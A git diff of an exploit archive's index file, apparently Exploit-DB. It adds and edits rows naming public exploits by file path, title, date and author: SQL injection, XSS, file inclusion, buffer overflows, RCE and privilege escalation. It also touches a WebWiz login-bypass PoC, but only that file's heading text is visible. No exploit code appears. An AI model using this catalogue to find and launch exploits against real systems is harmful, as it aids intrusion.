+29613,platforms/windows/dos/29613.txt,"CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",windows,dos,0 29614,platforms/osx/remote/29614.xml,"Parallels Drag and Drop Hidden Share Vulnerability",2007-02-16,"Rich Mogull",osx,remote,0 29615,platforms/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 Javascript File Request Information Disclosure Vulnerability",2007-02-19,gheetotank,php,webapps,0 29616,platforms/osx/dos/29616.xml,"Apple iTunes 7.0.2 XML Parsing Remote Denial of Service Vulnerability",2007-02-19,poplix,osx,dos,0 @@ -26600,7 +26600,7 @@ id,file,description,date,author,platform,type,port 29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 news.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0 29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 n_layouts.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0 29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0 -29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"Laurent Gaffie",php,webapps,0 +29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"Laurent Gaffie",php,webapps,0 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"Laurent Gaffie",php,webapps,0 29633,platforms/hardware/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",hardware,webapps,0 29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"Laurent Gaffie",php,webapps,0 @@ -26637,9 +26637,9 @@ id,file,description,date,author,platform,type,port 29669,platforms/php/webapps/29669.txt,"Wordpress Amplus Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29670,platforms/php/webapps/29670.txt,"Wordpress Make A Statement (MaS) Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 (.reg) - Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 -29672,platforms/php/webapps/29672.txt,"LiveZilla version 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 +29672,platforms/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0 and 2.608.GV00.0 - Authentication Bypass",2013-11-18,"Jake Reynolds",hardware,webapps,37777 -29674,platforms/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,jsp,webapps,0 +29674,platforms/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,jsp,webapps,0 29675,platforms/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,asp,webapps,0 29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 unistall.php Authentication Bypass",2007-02-26,R00t[ATI],php,webapps,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,R00t[ATI],php,webapps,0 @@ -26686,7 +26686,7 @@ id,file,description,date,author,platform,type,port 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.PHP Remote File Include Vulnerability",2007-03-09,"Hasadya Raed",php,webapps,0 29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service Vulnerability",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x Single Row SubSelect Remote Denial Of Service Vulnerability",2007-03-09,S.Streichsbier,linux,dos,0 -29725,platforms/openbsd/remote/29725.py,"OpenBSD 3.x/4.x ICMPV6 Packet Handling Remote Buffer Overflow Vulnerability",2007-03-09,"Alfredo Ortega",openbsd,remote,0 +29725,platforms/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow Vulnerability",2007-03-09,"Alfredo Ortega",openbsd,remote,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti Goster.ASP SQL injection Vulnerability",2007-03-09,Cr@zy_King,asp,webapps,0 29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 @@ -26740,7 +26740,7 @@ id,file,description,date,author,platform,type,port 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 Index.PHP Cross-Site Scripting Vulnerability",2007-03-26,Crackers_Child,php,webapps,0 29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 (.m3u) - SEH Buffer Overflow (Unicode)",2013-11-22,"Mike Czumak",windows,local,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 Search Function Cross-Site Scripting Vulnerability",2007-03-26,The[Boss],php,webapps,0 -29781,platforms/linux/local/29781.c,"Linux Kernel 2.6.x IPV6_SockGlue.c NULL Pointer Dereference Vulnerability",2007-03-26,"Joey Mengele",linux,local,0 +29781,platforms/linux/local/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference Vulnerability",2007-03-26,"Joey Mengele",linux,local,0 29782,platforms/php/webapps/29782.txt,"Satel Lite Satellite.PHP Local File Include Vulnerability",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 RSS Feed HTML Injection Vulnerability",2007-03-26,"CrYpTiC MauleR",php,webapps,0 29784,platforms/php/remote/29784.php,"PHP <= 5.2.1 Folded Mail Headers Email Header Injection Vulnerability",2007-11-26,"Stefan Esser",php,remote,0 @@ -26791,7 +26791,7 @@ id,file,description,date,author,platform,type,port 29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 Week_Events.PHP Remote File Include Vulnerability",2007-04-10,hackberry,php,webapps,0 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 -29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 +29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 @@ -26824,7 +26824,7 @@ id,file,description,date,author,platform,type,port 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include Vulnerability",2007-04-19,"HACKERS PAL",php,webapps,0 -29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 +29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 @@ -26846,7 +26846,7 @@ id,file,description,date,author,platform,type,port 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 include/controlcenter/users.php Multiple Method Remote Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 admin.php module[] Variable Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 include/admin/banlist.php delete Parameter CSRF Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 -29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 +29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29895,platforms/php/webapps/29895.txt,"phpMyAdmin <= 2.9.1 Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 @@ -26873,7 +26873,7 @@ id,file,description,date,author,platform,type,port 29916,platforms/linux/dos/29916.c,"Linux Kernel 2.6.x NETLINK_FIB_LOOKUP Local Denial of Service Vulnerability",2007-04-26,"Alexey Kuznetsov",linux,dos,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat <= 6.5 - Arbitrary File Upload Vulnerability",2013-11-30,"Miya Chung",php,webapps,0 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang parameter) XPath Injection Vulnerability",2013-11-30,LiquidWorm,java,webapps,0 -29919,platforms/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS",2013-11-30,"Dino Causevic",hardware,dos,0 +29919,platforms/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS",2013-11-30,"Dino Causevic",hardware,dos,0 29920,platforms/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow Vulnerability",2013-11-30,"Denis Andzakovic",linux,dos,0 29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 @@ -26903,7 +26903,7 @@ id,file,description,date,author,platform,type,port 29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local Vulnerability",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 -29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0 +29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution Vulnerability",2007-05-07,"Arnaud Giersch",linux,local,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.PHP SQL Injection Vulnerability",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 @@ -26958,9 +26958,94 @@ id,file,description,date,author,platform,type,port 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,Anonymous,php,webapps,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad# 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager Arbitrary File Upload",2013-12-03,metasploit,java,remote,0 -30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe Remote Code Execution",2013-12-03,metasploit,windows,remote,12221 +30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai v0.9.2 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30014,platforms/windows/local/30014.py,"NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,"Matteo Memelli",windows,local,0 +30014,platforms/windows/local/30014.py,"Windows NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0 +30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0 +30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0 +30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0 +30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability",2007-05-08,"Piotr Engelking",linux,remote,0 +30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 +30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x IF Query Handling Remote Denial Of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0 +30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,Anonymous,solaris,local,0 +30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 +30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b Multiple Denial Of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 +30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0 +30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 +30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 Unspecified Directory Traversal Vulnerability",2007-05-11,"Digital Defense",windows,remote,0 +30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0 +30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0 +30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0 +30031,platforms/hardware/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,hardware,webapps,0 +30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0 +30033,platforms/php/webapps/30033.txt,"Joomla com_hotornot2 2.0.0 - Remote Code Execution (RCE) Vulnerability",2013-12-04,DevilScreaM,php,webapps,0 +30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 Multiple SQL Injection Vulnerabilities",2007-05-14,"Jesper Jurcenoks",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0 +30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 Encoded Space (%20) Request Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 +30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 +30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass Vulnerability",2007-05-15,"Matousec Transparent security",multiple,local,0 +30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0 +30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 +30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 view/supplynews/ Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 +30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Embedded ICC Profile Image Parser Overflow",2007-05-16,"Chris Evans",linux,remote,0 +30044,platforms/linux/dos/30044.txt,"Sun Java JDK 1.x - BMP Parsing Remote Privilege Escalation",2007-05-16,"Chris Evans",linux,dos,0 +30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0 +30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial Of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 +30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"Laurent Gaffie",php,webapps,0 +30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 ShopContent.ASP Cross-Site Scripting Vulnerability",2007-05-17,"John Martinelli",asp,webapps,0 +30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow Vulnerability",2007-05-17,shinnai,windows,remote,0 +30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme header.php s Parameter XSS",2007-05-17,"John Martinelli",php,webapps,0 +30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.PHP Path Disclosure Vulnerability",2007-05-17,kefka,php,webapps,0 +30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 +30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 +30054,platforms/jsp/webapps/30054.txt,"Sonicwall GMS 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 +30055,platforms/hardware/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,hardware,webapps,0 +30056,platforms/hardware/webapps/30056.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,hardware,webapps,0 +30057,platforms/php/webapps/30057.txt,"openSIS <= 5.2 (ajax.php) - PHP Code Injection Vulnerability",2013-12-05,"Egidio Romano",php,webapps,0 +30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 +30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 +30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability",2013-12-06,"aceeeeeeeer .",php,webapps,0 +30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.PHP Multiple Cross Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 +30065,platforms/php/webapps/30065.html,"GaliX 2.0 Index.PHP Multiple Cross Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 +30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 Multiple SQL Injection Vulnerabilities",2007-05-21,"Jesper Jurcenoks",php,webapps,0 +30067,platforms/windows/remote/30067.txt,"rdiffWeb 0.3.5 Directory Traversal Vulnerability",2007-05-22,"Jesus Roncero",windows,remote,0 +30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 Login Variable Cross Site Scripting Vulnerability",2007-05-22,"Jesper Jurcenoks",php,webapps,0 +30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 DartZipLite.DLL ActiveX Control Buffer Overflow Vulnerability",2007-05-22,shinnai,windows,remote,0 +30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 Index.PHP HTML Injection Vulnerability",2007-05-22,"John Martinelli",php,webapps,0 +30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 Parser_Path Remote File Include Vulnerability",2007-05-22,the_Edit0r,php,webapps,0 +30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0 +30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 ShowOwn.PHP Cross Site Scripting Vulnerability",2007-05-22,CorryL,php,webapps,0 +30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability",2007-05-07,"Gregory Beaver",linux,remote,0 +30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.PHP Cross Site Scripting Vulnerability",2007-05-23,"Michal Majchrowicz",php,webapps,0 +30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.PHP Cross Site Scripting Vulnerability",2007-05-23,vagrant,php,webapps,0 +30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 Search Form Cross Site Scripting Vulnerability",2007-05-23,"Marc Ruef",asp,webapps,0 +30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 Cross-Domain Browser Location Information Disclosure Vulnerability",2007-05-23,"Gareth Heyes",multiple,remote,0 +30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 Rating.PHP Cross Site Scripting Vulnerability",2007-05-23,"Janek Vind",php,webapps,0 +30080,platforms/linux/dos/30080.c,"Linux Kernel 2.6.x VFat Compat IOCTLS Local Denial of Service Vulnerability",2007-05-24,"Bart Oldeman",linux,dos,0 +30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 News.ASP Cross Site Scripting Vulnerability",2007-05-24,vagrant,php,webapps,0 +30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.PHP Cross Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0 +30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability",2013-12-06,LiquidWorm,php,webapps,0 +30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery plugins Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 +30085,platforms/linux/webapps/30085.txt,"Zimbra 0day exploit / Privilegie escalation via LFI",2013-12-06,rubina119,linux,webapps,0 +30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.PHP Cross Site Scripting Vulnerability",2007-05-25,newbinaryfile,php,webapps,0 +30087,platforms/php/webapps/30087.txt,"Digirez 3.4 Multiple Cross Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 +30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass Vulnerability",2007-05-25,"242th section",php,webapps,0 +30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection Vulnerability",2007-05-25,BCC,linux,remote,0 +30090,platforms/php/webapps/30090.txt,"phpPgAdmin <= 4.1.1 Redirect.PHP Cross Site Scripting Vulnerability",2007-05-25,"Michal Majchrowicz",php,webapps,0 +30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component Remote Denial Of Service Vulnerability",2007-05-28,shinnai,linux,dos,0 +30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 +30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 Mutt_Gecos_Name Function Local Buffer Overflow Vulnerability",2007-05-28,raylai,linux,local,0 +30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.PHP Cross Site Scripting Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 +30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 News.PHP SQL Injection Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 +30096,platforms/osx/local/30096.txt,"Apple Mac OS X <= 10.4.9 - VPND Local Format String Vulnerability",2007-05-29,"Chris Anley",osx,local,0 +30097,platforms/php/webapps/30097.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php selected_theme Parameter XSS",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30098,platforms/php/webapps/30098.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php Multiple Variable Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30099,platforms/php/webapps/30099.txt,"DGNews 2.1 NewsID Parameter SQL Injection Vulnerability",2007-05-28,"Laurent Gaffie",php,webapps,0 +30100,platforms/windows/remote/30100.html,"British Telecommunications Consumer Webhelper 2.0.0.7 Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 +30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability",2007-05-29,"Laurent Gaffie",php,webapps,0 +30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.PHP Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0 +30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.PHP SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0 +30104,platforms/windows/remote/30104.nasl,"F-Secure Policy Manager 7.00 FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,remote,0 diff --git a/platforms/webapps/10372.txt b/platforms/aix/webapps/10372.txt similarity index 100% rename from platforms/webapps/10372.txt rename to platforms/aix/webapps/10372.txt diff --git a/platforms/webapps/11580.txt b/platforms/aix/webapps/11580.txt similarity index 100% rename from platforms/webapps/11580.txt rename to platforms/aix/webapps/11580.txt diff --git a/platforms/asp/webapps/1399.txt b/platforms/asp/webapps/1399.txt index a8bb8a57c..bc9ef300e 100755 --- a/platforms/asp/webapps/1399.txt +++ b/platforms/asp/webapps/1399.txt @@ -1,37 +1,37 @@ - - - -

WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory

-

Discovery and exploit by devil_box [at} kapda.ir

-

Kapda - Security Science Researchers Institute of Iran

-
- - - -
- - -

WebWiz Login Bypass PoC - Database login - Kapda `s advisory

-

Discovery and exploit by devil_box [at} kapda.ir

-

Kapda - Security Science Researchers Institute of Iran

-
- - - -
- -# milw0rm.com [2005-12-30] + + + +

WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory

+

Discovery and exploit by devil_box [at} kapda.ir

+

Kapda - Security Science Researchers Institute of Iran

+
+ + + +
+ + +

WebWiz Login Bypass PoC - Database login - Kapda `s advisory

+

Discovery and exploit by devil_box [at} kapda.ir
